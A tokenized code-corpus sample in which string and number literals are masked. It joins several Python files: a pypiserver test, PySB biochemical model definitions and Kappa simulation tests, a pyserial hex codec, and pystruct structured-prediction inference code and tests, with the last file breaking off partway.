<s> """<STR_LIT>""" <EOL> from __future__ import ( absolute_import , division , <EOL> print_function , unicode_literals ) <EOL> import logging <EOL> from os . path import abspath , dirname , join , realpath , relpath <EOL> from sys import path <EOL> import pytest <EOL> logger = logging . getLogger ( __name__ ) <EOL> test_dir = realpath ( dirname ( __file__ ) ) <EOL> src_dir = abspath ( join ( test_dir , '<STR_LIT:..>' ) ) <EOL> path . append ( src_dir ) <EOL> print ( path ) <EOL> import pypiserver <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> { } , <EOL> { '<STR_LIT:root>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:root>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ] ) <EOL> def test_paste_app_factory ( conf_options , monkeypatch ) : <EOL> """<STR_LIT>""" <EOL> monkeypatch . setattr ( '<STR_LIT>' , <EOL> lambda ** x : ( x , [ x . keys ( ) ] ) ) <EOL> pypiserver . paste_app_factory ( { } , ** conf_options ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from pysb import * <EOL> from pysb . macros import assemble_pore_sequential , pore_transport , pore_species <EOL> Model ( ) <EOL> Monomer ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:t>' ] ) <EOL> Annotation ( Bax , '<STR_LIT>' ) <EOL> Monomer ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:t>' ] , { '<STR_LIT>' : [ '<STR_LIT:m>' , '<STR_LIT:c>' ] } ) <EOL> Annotation ( Smac , '<STR_LIT>' ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT> ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT> ) <EOL> for p in Bax_0 , Smac_0 : <EOL> Annotation ( p , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> Initial ( Bax ( s1 = None , s2 = None , t = None ) , Bax_0 ) <EOL> Initial ( Smac ( loc = '<STR_LIT:m>' , t = None ) , Smac_0 ) <EOL> max_size = <NUM_LIT:6> <EOL> min_transport_size = <NUM_LIT:4> <EOL> assembly_rates = [ [ <NUM_LIT> , <NUM_LIT> ] ] * ( max_size - <NUM_LIT:1> ) <EOL> transport_rates = [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] * ( max_size - min_transport_size + <NUM_LIT:1> ) <EOL> assemble_pore_sequential ( Bax ( t = None ) , '<STR_LIT>' , '<STR_LIT>' , max_size , assembly_rates ) <EOL> pore_transport ( Bax , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:t>' , min_transport_size , max_size , <EOL> Smac ( loc = '<STR_LIT:m>' ) , '<STR_LIT:t>' , Smac ( loc = '<STR_LIT:c>' ) , transport_rates ) <EOL> for size in range ( <NUM_LIT:1> , max_size + <NUM_LIT:1> ) : <EOL> Observable ( '<STR_LIT>' % size , pore_species ( Bax , '<STR_LIT>' , '<STR_LIT>' , size ) ) <EOL> Observable ( '<STR_LIT>' , Smac ( loc = '<STR_LIT:m>' , t = None ) ) <EOL> Observable ( '<STR_LIT>' , Smac ( loc = '<STR_LIT:c>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( __doc__ , "<STR_LIT:\n>" , model ) <EOL> print ( """<STR_LIT>""" ) </s>
<s> from pysb import * <EOL> Model ( ) <EOL> Monomer ( '<STR_LIT:A>' ) <EOL> Parameter ( '<STR_LIT:k>' , <NUM_LIT> ) <EOL> Rule ( '<STR_LIT>' , None >> A ( ) , k ) </s>
<s> from pysb . testing import * <EOL> from pysb import * <EOL> from pysb . kappa import * <EOL> from pysb . bng import generate_network <EOL> import subprocess <EOL> from re import split <EOL> import pygraphviz as pgv <EOL> @ with_model <EOL> def test_kappa_simulation_results ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Initial ( A ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) >> A ( b = None ) + B ( b = None ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> npts = <NUM_LIT:200> <EOL> kres = run_simulation ( model , time = <NUM_LIT:100> , points = npts ) <EOL> ok_ ( len ( kres [ '<STR_LIT:time>' ] ) == npts + <NUM_LIT:1> ) <EOL> ok_ ( len ( kres [ '<STR_LIT>' ] ) == npts + <NUM_LIT:1> ) <EOL> ok_ ( kres [ '<STR_LIT:time>' ] [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> ok_ ( sorted ( kres [ '<STR_LIT:time>' ] ) [ - <NUM_LIT:1> ] == <NUM_LIT:100> ) <EOL> @ with_model <EOL> def test_kappa_expressions ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:u>' ] } ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:0.1> ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1000> ) <EOL> Expression ( '<STR_LIT>' , <NUM_LIT> / two ) <EOL> Initial ( A ( site = ( '<STR_LIT:u>' ) ) , num_A ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( site = '<STR_LIT:u>' ) + A ( site = '<STR_LIT:u>' ) >> A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) % A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) , kf ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) 
) % A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) >> <EOL> A ( site = '<STR_LIT:u>' ) + A ( site = '<STR_LIT:u>' ) , kr ) <EOL> run_simulation ( model , time = <NUM_LIT:0> ) <EOL> Rule ( '<STR_LIT>' , A ( site = ( '<STR_LIT:u>' , ANY ) ) >> None , kr ) <EOL> Observable ( '<STR_LIT>' , A ( site = ( '<STR_LIT:u>' , ANY ) ) ) <EOL> run_simulation ( model , time = <NUM_LIT:0> ) <EOL> @ with_model <EOL> def test_flux_map ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:a>' , '<STR_LIT:c>' ] ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT:b>' ] ) <EOL> Parameter ( '<STR_LIT:k>' , <NUM_LIT> ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( a = None ) >> A ( b = <NUM_LIT:1> ) % B ( a = <NUM_LIT:1> ) , k ) <EOL> Rule ( '<STR_LIT>' , C ( b = None ) + B ( c = None ) >> C ( b = <NUM_LIT:1> ) % B ( c = <NUM_LIT:1> ) , k ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( a = <NUM_LIT:1> , c = <NUM_LIT:2> ) % C ( b = <NUM_LIT:2> ) ) <EOL> Initial ( A ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( a = None , c = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> res = run_simulation ( model , time = <NUM_LIT:10> , points = <NUM_LIT:100> , flux_map = True , <EOL> output_dir = '<STR_LIT:.>' , cleanup = True , verbose = False ) <EOL> simdata = res . timecourse <EOL> ok_ ( len ( simdata [ '<STR_LIT:time>' ] ) == <NUM_LIT> ) <EOL> ok_ ( len ( simdata [ '<STR_LIT>' ] ) == <NUM_LIT> ) <EOL> ok_ ( simdata [ '<STR_LIT:time>' ] [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> ok_ ( sorted ( simdata [ '<STR_LIT:time>' ] ) [ - <NUM_LIT:1> ] == <NUM_LIT:10> ) <EOL> fluxmap = res . flux_map <EOL> ok_ ( isinstance ( fluxmap , pgv . 
AGraph ) ) <EOL> @ with_model <EOL> def test_kappa_wild ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] ) <EOL> Initial ( A ( site = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( site = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( A ( site = <NUM_LIT:1> ) % B ( site = <NUM_LIT:1> ) , Parameter ( '<STR_LIT>' , <NUM_LIT:1000> ) ) <EOL> Rule ( '<STR_LIT>' , A ( site = pysb . WILD ) >> None , Parameter ( '<STR_LIT:k>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( ) ) <EOL> run_simulation ( model , time = <NUM_LIT:0> ) <EOL> @ raises ( ValueError ) <EOL> @ with_model <EOL> def test_run_static_analysis_valueerror ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = False , influence_map = False , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> @ with_model <EOL> def test_run_static_analysis_cmap ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = True , influence_map = False , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res . contact_map , pgv . AGraph ) ) <EOL> ok_ ( res . 
influence_map is None ) <EOL> @ with_model <EOL> def test_run_static_analysis_imap ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Initial ( A ( ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( ) + B ( active = '<STR_LIT:n>' ) >> A ( ) + B ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:n>' ) >> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = False , influence_map = True , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res . influence_map , pgv . AGraph ) ) <EOL> ok_ ( res . 
contact_map is None ) <EOL> @ with_model <EOL> def test_run_static_analysis_both ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Initial ( A ( ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( ) + B ( active = '<STR_LIT:n>' ) >> A ( ) + B ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:n>' ) >> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = True , influence_map = True , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res . influence_map , pgv . AGraph ) ) <EOL> ok_ ( isinstance ( res . contact_map , pgv . AGraph ) ) <EOL> @ with_model <EOL> def test_contact_map ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> res = contact_map ( model , cleanup = True , output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res , pgv . 
AGraph ) ) <EOL> @ with_model <EOL> def test_influence_map_kasa ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Initial ( A ( ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( ) + B ( active = '<STR_LIT:n>' ) >> A ( ) + B ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:n>' ) >> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> res = influence_map ( model , cleanup = True ) <EOL> ok_ ( isinstance ( res , pgv . AGraph ) ) </s>
<s> """<STR_LIT>""" <EOL> import codecs <EOL> import serial <EOL> try : <EOL> unicode <EOL> except ( NameError , AttributeError ) : <EOL> unicode = str <EOL> HEXDIGITS = '<STR_LIT>' <EOL> def hex_encode ( data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return ( serial . to_bytes ( [ int ( h , <NUM_LIT:16> ) for h in data . split ( ) ] ) , len ( data ) ) <EOL> def hex_decode ( data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return ( unicode ( '<STR_LIT>' . join ( '<STR_LIT>' . format ( ord ( b ) ) for b in serial . iterbytes ( data ) ) ) , len ( data ) ) <EOL> class Codec ( codecs . Codec ) : <EOL> def encode ( self , data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return serial . to_bytes ( [ int ( h , <NUM_LIT:16> ) for h in data . split ( ) ] ) <EOL> def decode ( self , data , errors = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> return unicode ( '<STR_LIT>' . join ( '<STR_LIT>' . format ( ord ( b ) ) for b in serial . iterbytes ( data ) ) ) <EOL> class IncrementalEncoder ( codecs . IncrementalEncoder ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , errors = '<STR_LIT:strict>' ) : <EOL> self . errors = errors <EOL> self . state = <NUM_LIT:0> <EOL> def reset ( self ) : <EOL> self . state = <NUM_LIT:0> <EOL> def getstate ( self ) : <EOL> return self . state <EOL> def setstate ( self , state ) : <EOL> self . state = state <EOL> def encode ( self , data , final = False ) : <EOL> """<STR_LIT>""" <EOL> state = self . state <EOL> encoded = [ ] <EOL> for c in data . upper ( ) : <EOL> if c in HEXDIGITS : <EOL> z = HEXDIGITS . index ( c ) <EOL> if state : <EOL> encoded . append ( z + ( state & <NUM_LIT> ) ) <EOL> state = <NUM_LIT:0> <EOL> else : <EOL> state = <NUM_LIT> + ( z << <NUM_LIT:4> ) <EOL> elif c == '<STR_LIT:U+0020>' : <EOL> if state and self . errors == '<STR_LIT:strict>' : <EOL> raise UnicodeError ( '<STR_LIT>' ) <EOL> state = <NUM_LIT:0> <EOL> else : <EOL> if self . 
errors == '<STR_LIT:strict>' : <EOL> raise UnicodeError ( '<STR_LIT>' % c ) <EOL> self . state = state <EOL> return serial . to_bytes ( encoded ) <EOL> class IncrementalDecoder ( codecs . IncrementalDecoder ) : <EOL> """<STR_LIT>""" <EOL> def decode ( self , data , final = False ) : <EOL> return unicode ( '<STR_LIT>' . join ( '<STR_LIT>' . format ( ord ( b ) ) for b in serial . iterbytes ( data ) ) ) <EOL> class StreamWriter ( Codec , codecs . StreamWriter ) : <EOL> """<STR_LIT>""" <EOL> class StreamReader ( Codec , codecs . StreamReader ) : <EOL> """<STR_LIT>""" <EOL> def getregentry ( ) : <EOL> """<STR_LIT>""" <EOL> return codecs . CodecInfo ( <EOL> name = '<STR_LIT>' , <EOL> encode = hex_encode , <EOL> decode = hex_decode , <EOL> incrementalencoder = IncrementalEncoder , <EOL> incrementaldecoder = IncrementalDecoder , <EOL> streamwriter = StreamWriter , <EOL> streamreader = StreamReader , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from pystruct . datasets import load_letters <EOL> from pystruct . models import ChainCRF <EOL> from pystruct . learners import OneSlackSSVM <EOL> abc = "<STR_LIT>" <EOL> letters = load_letters ( ) <EOL> X , y , folds = letters [ '<STR_LIT:data>' ] , letters [ '<STR_LIT>' ] , letters [ '<STR_LIT>' ] <EOL> X , y = np . array ( X ) , np . array ( y ) <EOL> X_train , X_test = X [ folds == <NUM_LIT:1> ] , X [ folds != <NUM_LIT:1> ] <EOL> y_train , y_test = y [ folds == <NUM_LIT:1> ] , y [ folds != <NUM_LIT:1> ] <EOL> model = ChainCRF ( ) <EOL> ssvm = OneSlackSSVM ( model = model , C = <NUM_LIT> , tol = <NUM_LIT:0.1> , verbose = <NUM_LIT:3> , max_iter = <NUM_LIT:20> ) <EOL> ssvm . fit ( X_train , y_train ) <EOL> print ( "<STR_LIT>" % ssvm . score ( X_test , y_test ) ) </s>
<s> import numpy as np <EOL> from scipy import sparse <EOL> from . common import _validate_params <EOL> from . . utils . graph_functions import is_forest <EOL> def edges_to_graph ( edges , n_vertices = None ) : <EOL> if n_vertices is None : <EOL> n_vertices = np . max ( edges ) + <NUM_LIT:1> <EOL> graph = sparse . coo_matrix ( ( np . ones ( len ( edges ) ) , edges . T ) , <EOL> shape = ( n_vertices , n_vertices ) ) . tocsr ( ) <EOL> return graph <EOL> def is_chain ( edges , n_vertices ) : <EOL> """<STR_LIT>""" <EOL> return ( np . all ( edges [ : , <NUM_LIT:0> ] == np . arange ( <NUM_LIT:0> , n_vertices - <NUM_LIT:1> ) ) <EOL> and np . all ( edges [ : , <NUM_LIT:1> ] == np . arange ( <NUM_LIT:1> , n_vertices ) ) ) <EOL> def inference_max_product ( unary_potentials , pairwise_potentials , edges , <EOL> max_iter = <NUM_LIT:30> , damping = <NUM_LIT:0.5> , tol = <NUM_LIT> , relaxed = None ) : <EOL> """<STR_LIT>""" <EOL> from . _viterbi import viterbi <EOL> n_states , pairwise_potentials = _validate_params ( unary_potentials , pairwise_potentials , edges ) <EOL> if is_chain ( edges = edges , n_vertices = len ( unary_potentials ) ) : <EOL> y = viterbi ( unary_potentials . astype ( np . float ) . copy ( ) , <EOL> np . array ( pairwise_potentials , dtype = np . float ) ) <EOL> elif is_forest ( edges = edges , n_vertices = len ( unary_potentials ) ) : <EOL> y = tree_max_product ( unary_potentials , pairwise_potentials , edges ) <EOL> else : <EOL> y = iterative_max_product ( unary_potentials , pairwise_potentials , edges , <EOL> max_iter = max_iter , damping = damping ) <EOL> return y <EOL> def tree_max_product ( unary_potentials , pairwise_potentials , edges ) : <EOL> n_vertices , n_states = unary_potentials . shape <EOL> parents = - np . ones ( n_vertices , dtype = np . int ) <EOL> visited = np . zeros ( n_vertices , dtype = np . 
bool ) <EOL> neighbors = [ [ ] for i in range ( n_vertices ) ] <EOL> pairwise_weights = [ [ ] for i in range ( n_vertices ) ] <EOL> for pw , edge in zip ( pairwise_potentials , edges ) : <EOL> neighbors [ edge [ <NUM_LIT:0> ] ] . append ( edge [ <NUM_LIT:1> ] ) <EOL> pairwise_weights [ edge [ <NUM_LIT:0> ] ] . append ( pw ) <EOL> neighbors [ edge [ <NUM_LIT:1> ] ] . append ( edge [ <NUM_LIT:0> ] ) <EOL> pairwise_weights [ edge [ <NUM_LIT:1> ] ] . append ( pw . T ) <EOL> messages_forward = np . zeros ( ( n_vertices , n_states ) ) <EOL> messages_backward = np . zeros ( ( n_vertices , n_states ) ) <EOL> pw_forward = np . zeros ( ( n_vertices , n_states , n_states ) ) <EOL> traversal = [ ] <EOL> lonely = <NUM_LIT:0> <EOL> while lonely < n_vertices : <EOL> for i in range ( lonely , n_vertices ) : <EOL> if not visited [ i ] : <EOL> queue = [ i ] <EOL> lonely = i + <NUM_LIT:1> <EOL> visited [ i ] = True <EOL> break <EOL> lonely = n_vertices <EOL> while queue : <EOL> node = queue . pop ( <NUM_LIT:0> ) <EOL> traversal . append ( node ) <EOL> for pw , neighbor in zip ( pairwise_weights [ node ] , neighbors [ node ] ) : <EOL> if not visited [ neighbor ] : <EOL> parents [ neighbor ] = node <EOL> queue . append ( neighbor ) <EOL> visited [ neighbor ] = True <EOL> pw_forward [ neighbor ] = pw <EOL> elif not parents [ node ] == neighbor : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for node in traversal [ : : - <NUM_LIT:1> ] : <EOL> parent = parents [ node ] <EOL> if parent != - <NUM_LIT:1> : <EOL> message = np . max ( messages_backward [ node ] + unary_potentials [ node ] + <EOL> pw_forward [ node ] , axis = <NUM_LIT:1> ) <EOL> message -= message . max ( ) <EOL> messages_backward [ parent ] += message <EOL> for node in traversal : <EOL> parent = parents [ node ] <EOL> if parent != - <NUM_LIT:1> : <EOL> message = messages_forward [ parent ] + unary_potentials [ parent ] + pw_forward [ node ] . T <EOL> message += messages_backward [ parent ] - np . 
max ( messages_backward [ node ] <EOL> + unary_potentials [ node ] <EOL> + pw_forward [ node ] , axis = <NUM_LIT:1> ) <EOL> message = message . max ( axis = <NUM_LIT:1> ) <EOL> message -= message . max ( ) <EOL> messages_forward [ node ] += message <EOL> return np . argmax ( unary_potentials + messages_forward + messages_backward , axis = <NUM_LIT:1> ) <EOL> def iterative_max_product ( unary_potentials , pairwise_potentials , edges , <EOL> max_iter = <NUM_LIT:10> , damping = <NUM_LIT> , tol = <NUM_LIT> ) : <EOL> n_edges = len ( edges ) <EOL> n_vertices , n_states = unary_potentials . shape <EOL> messages = np . zeros ( ( n_edges , <NUM_LIT:2> , n_states ) ) <EOL> all_incoming = np . zeros ( ( n_vertices , n_states ) ) <EOL> for i in range ( max_iter ) : <EOL> diff = <NUM_LIT:0> <EOL> for e , ( edge , pairwise ) in enumerate ( zip ( edges , pairwise_potentials ) ) : <EOL> update = ( all_incoming [ edge [ <NUM_LIT:0> ] ] + pairwise . T + <EOL> unary_potentials [ edge [ <NUM_LIT:0> ] ] <EOL> - messages [ e , <NUM_LIT:1> ] ) <EOL> old_message = messages [ e , <NUM_LIT:0> ] . copy ( ) <EOL> new_message = np . max ( update , axis = <NUM_LIT:1> ) <EOL> new_message -= np . max ( new_message ) <EOL> new_message = damping * old_message + ( <NUM_LIT:1> - damping ) * new_message <EOL> messages [ e , <NUM_LIT:0> ] = new_message <EOL> update = new_message - old_message <EOL> all_incoming [ edge [ <NUM_LIT:1> ] ] += update <EOL> diff += np . abs ( update ) . sum ( ) <EOL> update = ( all_incoming [ edge [ <NUM_LIT:1> ] ] + pairwise + <EOL> unary_potentials [ edge [ <NUM_LIT:1> ] ] <EOL> - messages [ e , <NUM_LIT:0> ] ) <EOL> old_message = messages [ e , <NUM_LIT:1> ] . copy ( ) <EOL> new_message = np . max ( update , axis = <NUM_LIT:1> ) <EOL> new_message -= np . 
max ( messages [ e , <NUM_LIT:1> ] ) <EOL> new_message = damping * old_message + ( <NUM_LIT:1> - damping ) * new_message <EOL> messages [ e , <NUM_LIT:1> ] = new_message <EOL> update = new_message - old_message <EOL> all_incoming [ edge [ <NUM_LIT:0> ] ] += update <EOL> diff += np . abs ( update ) . sum ( ) <EOL> if diff < tol : <EOL> break <EOL> return np . argmax ( all_incoming + unary_potentials , axis = <NUM_LIT:1> ) </s>
<s> import numpy as np <EOL> from nose . tools import assert_true , assert_false <EOL> from nose import SkipTest <EOL> from numpy . testing import assert_array_equal <EOL> from scipy import sparse <EOL> from pystruct . inference . maxprod import ( is_forest , inference_max_product , <EOL> iterative_max_product , is_chain ) <EOL> from pystruct . inference import inference_ad3 <EOL> from pystruct . datasets import generate_blocks , generate_blocks_multinomial <EOL> from pystruct . models import GridCRF <EOL> def test_is_chain ( ) : <EOL> chain = np . c_ [ np . arange ( <NUM_LIT:9> ) , np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) ] <EOL> assert_true ( is_chain ( chain , len ( chain ) + <NUM_LIT:1> ) ) <EOL> assert_false ( is_chain ( chain , len ( chain ) ) ) <EOL> circle = np . vstack ( [ chain , [ <NUM_LIT:9> , <NUM_LIT:0> ] ] ) <EOL> assert_false ( is_chain ( circle , len ( circle ) ) ) <EOL> assert_false ( is_chain ( chain [ : : - <NUM_LIT:1> ] , len ( chain ) + <NUM_LIT:1> ) ) <EOL> def test_is_forest ( ) : <EOL> chain = np . c_ [ np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) , np . arange ( <NUM_LIT:9> ) ] <EOL> assert_true ( is_forest ( chain , len ( chain ) + <NUM_LIT:1> ) ) <EOL> assert_true ( is_forest ( chain ) ) <EOL> circle = np . vstack ( [ chain , [ <NUM_LIT:9> , <NUM_LIT:0> ] ] ) <EOL> assert_false ( is_forest ( circle ) ) <EOL> assert_false ( is_forest ( circle , len ( chain ) + <NUM_LIT:1> ) ) <EOL> two_chains = np . vstack ( [ chain , chain + <NUM_LIT:10> ] ) <EOL> assert_true ( is_forest ( two_chains , <NUM_LIT:20> ) ) <EOL> disco_graph = np . vstack ( [ chain , circle + <NUM_LIT:10> ] ) <EOL> assert_false ( is_forest ( disco_graph ) ) <EOL> graph = np . random . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> edges = np . c_ [ graph . nonzero ( ) ] <EOL> assert_false ( is_forest ( edges ) ) <EOL> try : <EOL> from scipy . sparse . csgraph import minimum_spanning_tree <EOL> tree = minimum_spanning_tree ( sparse . 
